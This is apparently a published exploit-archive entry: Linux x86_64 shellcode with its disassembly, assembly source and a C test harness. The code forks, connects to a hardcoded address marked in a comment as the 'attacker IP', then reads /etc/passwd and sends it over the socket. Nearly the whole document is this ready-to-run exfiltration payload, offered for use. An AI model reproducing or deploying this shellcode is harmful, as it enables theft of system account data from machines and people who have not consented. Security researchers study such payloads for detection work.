/* # Title : Linux x86_64 /etc/passwd file sender shellcode # Date : 28-06-2016 # Author : Roziul Hasan Khan Shifat # Tested On : Ubuntu 14.04 LTS x86_64 */ /* Disassembly of section .text: 0000000000400080 <_start>: 400080: 48 31 c0 xor %rax,%rax 400083: b0 39 mov $0x39,%al 400085: 0f 05 syscall 400087: 99 cltd 400088: 48 39 d0 cmp %rdx,%rax 40008b: 74 07 je 400094 40008d: 48 31 c0 xor %rax,%rax 400090: b0 3c mov $0x3c,%al 400092: 0f 05 syscall 0000000000400094 : 400094: b2 06 mov $0x6,%dl 400096: 48 31 f6 xor %rsi,%rsi 400099: 48 ff c6 inc %rsi 40009c: 40 b7 02 mov $0x2,%dil 40009f: 48 31 c0 xor %rax,%rax 4000a2: b0 29 mov $0x29,%al 4000a4: 0f 05 syscall 4000a6: 4d 31 c0 xor %r8,%r8 4000a9: 49 89 c0 mov %rax,%r8 4000ac: 48 31 c0 xor %rax,%rax 4000af: 99 cltd 4000b0: 48 31 ff xor %rdi,%rdi 4000b3: 48 31 f6 xor %rsi,%rsi 4000b6: 50 push %rax 4000b7: 50 push %rax 4000b8: 50 push %rax 4000b9: c6 04 24 02 movb $0x2,(%rsp) 4000bd: 66 c7 44 24 02 05 c0 movw $0xc005,0x2(%rsp) 4000c4: c7 44 24 04 c0 a8 56 movl $0x8056a8c0,0x4(%rsp) 4000cb: 80 4000cc: 48 89 e6 mov %rsp,%rsi 4000cf: b2 10 mov $0x10,%dl 4000d1: 4c 89 c7 mov %r8,%rdi 00000000004000d4 : 4000d4: 48 31 c0 xor %rax,%rax 4000d7: b0 2a mov $0x2a,%al 4000d9: 0f 05 syscall 4000db: 4d 31 c9 xor %r9,%r9 4000de: 4c 39 c8 cmp %r9,%rax 4000e1: 75 f1 jne 4000d4 4000e3: 48 31 c0 xor %rax,%rax 4000e6: 48 31 f6 xor %rsi,%rsi 4000e9: 50 push %rax 4000ea: 50 push %rax 4000eb: 50 push %rax 4000ec: c7 04 24 2f 65 74 63 movl $0x6374652f,(%rsp) 4000f3: c7 44 24 04 2f 2f 70 movl $0x61702f2f,0x4(%rsp) 4000fa: 61 4000fb: c7 44 24 08 73 73 77 movl $0x64777373,0x8(%rsp) 400102: 64 400103: 48 89 e7 mov %rsp,%rdi 400106: b0 02 mov $0x2,%al 400108: 0f 05 syscall 40010a: 48 89 c6 mov %rax,%rsi 40010d: 4c 89 c7 mov %r8,%rdi 400110: 99 cltd 400111: 66 41 ba 88 13 mov $0x1388,%r10w 400116: 48 31 c0 xor %rax,%rax 400119: b0 28 mov $0x28,%al 40011b: 0f 05 syscall 40011d: 48 31 c0 xor %rax,%rax 400120: b0 3c mov $0x3c,%al 400122: 0f 05 syscall */ /* section .text global _start _start: xor rax,rax mov al,57 syscall cdq cmp rax,rdx jz send xor rax,rax mov al,60 syscall send: ;---------------- ;connecting to server ;------------------------- ;creating socket mov dl,6 xor rsi,rsi inc rsi mov dil,2 xor rax,rax mov al,41 syscall ;--------------------- xor r8,r8 mov r8,rax ;socket descriptor ;---------------------------- ;connecting............. ;struct sockaddr_in 16 bytes ;sin_family 2 bytes ;sin_port 2 bytes ;sin_addr 4 bytes xor rax,rax cdq xor rdi,rdi xor rsi,rsi push rax push rax push rax mov [rsp],byte 2 mov [rsp+2],word 0xc005 ;port 1472 (change it if U want) mov [rsp+4],dword 0x8056a8c0 ;change it to attacker IP mov rsi,rsp mov dl,16 mov rdi,r8 connect: xor rax,rax mov al,42 syscall xor r9,r9 cmp rax,r9 jnz connect ;------------------------------ ;opennig /etc/passwd xor rax,rax xor rsi,rsi push rax push rax push rax mov [rsp],dword '/etc' mov [rsp+4],dword '//pa' mov [rsp+8],dword 'sswd' mov rdi,rsp mov al,2 syscall ;---------------------- ;sending............... mov rsi,rax ;in_fd mov rdi,r8 ;out_fd cdq mov r10w,5000 xor rax,rax mov al,40 syscall ;-------------- ;exiting xor rax,rax mov al,60 syscall */ #include #include char shellcode[]="\x48\x31\xc0\xb0\x39\x0f\x05\x99\x48\x39\xd0\x74\x07\x48\x31\xc0\xb0\x3c\x0f\x05\xb2\x06\x48\x31\xf6\x48\xff\xc6\x40\xb7\x02\x48\x31\xc0\xb0\x29\x0f\x05\x4d\x31\xc0\x49\x89\xc0\x48\x31\xc0\x99\x48\x31\xff\x48\x31\xf6\x50\x50\x50\xc6\x04\x24\x02\x66\xc7\x44\x24\x02\x05\xc0\xc7\x44\x24\x04\xc0\xa8\x56\x80\x48\x89\xe6\xb2\x10\x4c\x89\xc7\x48\x31\xc0\xb0\x2a\x0f\x05\x4d\x31\xc9\x4c\x39\xc8\x75\xf1\x48\x31\xc0\x48\x31\xf6\x50\x50\x50\xc7\x04\x24\x2f\x65\x74\x63\xc7\x44\x24\x04\x2f\x2f\x70\x61\xc7\x44\x24\x08\x73\x73\x77\x64\x48\x89\xe7\xb0\x02\x0f\x05\x48\x89\xc6\x4c\x89\xc7\x99\x66\x41\xba\x88\x13\x48\x31\xc0\xb0\x28\x0f\x05\x48\x31\xc0\xb0\x3c\x0f\x05"; main() { printf("shellcode length %ld\n",(long)strlen(shellcode)); (* (int(*)()) shellcode) (); }